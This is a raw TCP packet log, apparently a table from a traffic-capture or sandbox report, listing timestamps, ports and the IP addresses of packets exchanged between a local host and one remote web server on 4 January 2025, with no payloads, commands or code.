Jan 4, 2025 15:33:22.695735931 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.695736885 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.695758104 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.695770025 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.736715078 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.736726046 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.736797094 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.839409113 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.839462042 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.839473009 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.839484930 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.839497089 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.839509964 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.839540005 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:23.131351948 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.131402016 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.131412983 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.131515980 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.131516933 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:23.131536007 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.131550074 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.131561995 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.131563902 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:23.131575108 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.131594896 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:23.131614923 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:23.131939888 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.131987095 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:23.132013083 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.132025003 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.132036924 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.132049084 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.132055998 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:23.132061958 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.132075071 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.132088900 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:23.132108927 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:23.132132053 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:23.132664919 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.132678032 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.132690907 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.132700920 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.132713079 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.132718086 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:23.132724047 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.132736921 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.132750034 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:23.132766962 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:23.132787943 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:23.175056934 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.175168991 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:23.175214052 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.175251961 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:23.277089119 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.277101994 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.277151108 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.277157068 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:23.277162075 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.277194977 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:23.277218103 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:23.277390003 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.277439117 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:23.277442932 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.277452946 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.277465105 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.277482986 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:23.277494907 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:23.277597904 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.277607918 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.277637005 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.277640104 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:23.277663946 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:23.277673960 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:23.277681112 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.277717113 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:23.374533892 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.374558926 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.374619007 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:23.374643087 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:23.424283028 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.424299955 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.424312115 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.424385071 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:23.424418926 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:23.424465895 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.424478054 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.424506903 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:23.424524069 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:23.424530983 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.424542904 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.424575090 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:23.424730062 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.424743891 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.424755096 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.424771070 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:23.424798012 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:23.424885035 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.424896002 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.424936056 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:23.562035084 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.562061071 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.562133074 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:23.562151909 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:23.570077896 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.570092916 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.570138931 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:23.570431948 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.570446014 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.570458889 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.570487022 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:23.570501089 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:23.570530891 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.570571899 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:23.570579052 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.570626020 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:23.863378048 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.863393068 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.863457918 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:23.863507986 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.863518953 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:23.863550901 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:24.084913015 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.084930897 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.084938049 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.084944010 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.084954977 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.084970951 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.084983110 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.085028887 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:24.085078955 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:24.155230999 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.155251980 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.155265093 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.155277014 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.155291080 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.155302048 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.155350924 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:24.155404091 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:24.155442953 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.155461073 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.155482054 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:24.155508995 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:24.218082905 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.218095064 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.218190908 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:24.300421000 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.300435066 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.300513983 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:24.343195915 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.343211889 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.343367100 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:24.404970884 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.404987097 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.405045033 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:24.405045033 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:24.489243031 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.489259958 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.489276886 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.489418030 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:24.592973948 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.592993021 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.593003988 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.593049049 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:24.593080044 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:24.634521961 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.634537935 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.634574890 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.634584904 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.634624958 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:24.634649992 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:24.740240097 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.740257025 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.740262985 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.740427971 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:24.783447027 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.783535004 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:24.783593893 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.783636093 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:24.783668995 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.783679008 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.783781052 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:24.885200024 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.885217905 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.885229111 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.885343075 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:24.926253080 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.926346064 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:24.926398039 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.926409960 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.926423073 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.926435947 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:24.926436901 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:24.926460028 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:24.926496029 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:25.030456066 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.030471087 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.030524015 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:25.030570984 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.030582905 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.030611038 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:25.030637026 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:25.071736097 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.071748018 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.071820021 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.071831942 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.071844101 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.071866989 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:25.071907043 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:25.176094055 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.176116943 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.176126003 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.176137924 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.176244020 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:25.176275969 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:25.216538906 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.216551065 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.216687918 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:25.216751099 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.216763973 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.216778040 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.216789961 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.216797113 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:25.216834068 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:25.321742058 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.321758986 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.321769953 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.321887016 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:25.549472094 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.549485922 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.549587011 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:25.612209082 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.612224102 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.612235069 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.612292051 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:25.612309933 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.612323046 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.612334967 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.612344027 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:25.612344027 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:25.612366915 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:25.612370014 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.612382889 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:25.612400055 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.612411022 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:25.612452030 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:25.612790108 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.612802029 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.612829924 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:25.612848043 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:25.653767109 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.653781891 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.653798103 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.653835058 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:25.653862000 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:25.695033073 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.695046902 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.695086956 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:25.695158958 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:25.757462025 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.757481098 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.757524014 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:25.757555962 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:25.799851894 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.799858093 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.799913883 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:25.799927950 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.799942017 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.799973965 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:25.799999952 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:25.891052961 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.891077995 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.891127110 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:25.891128063 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.891127110 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:25.891143084 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.891165018 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:25.891191006 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:25.945810080 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.945832968 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:25.945873976 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:25.945926905 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:26.329289913 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:26.329308033 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:26.329325914 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:26.329381943 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:26.329394102 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:26.329405069 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:26.329418898 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:26.329432011 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:26.329471111 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:26.329472065 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:26.449702978 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:26.449722052 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:26.449739933 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:26.449804068 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:26.449815035 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:26.449827909 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:26.449856997 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:26.449886084 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:26.475375891 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:26.475394964 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:26.475460052 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:26.475466967 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:26.475485086 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:26.475498915 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:26.475550890 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:26.475554943 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:26.475564957 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:26.475600004 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:26.475621939 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:26.594974995 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:26.595001936 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:26.595050097 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:26.595072031 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:26.621937037 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:26.621953011 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:26.621968985 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:26.622014046 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:26.622035980 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:26.622040987 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:26.622055054 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:26.622066021 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:26.622091055 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:26.622117043 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:26.767374039 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:26.767389059 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:26.767427921 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:26.767457008 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:26.767530918 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:26.767549992 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:26.767563105 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:26.767575026 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:26.767585993 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:26.767589092 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:26.767617941 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:26.767636061 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:26.913177013 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:26.913192987 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:26.913232088 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:26.913269043 CET	49709	80	192.168.2.8	176.113.115.19
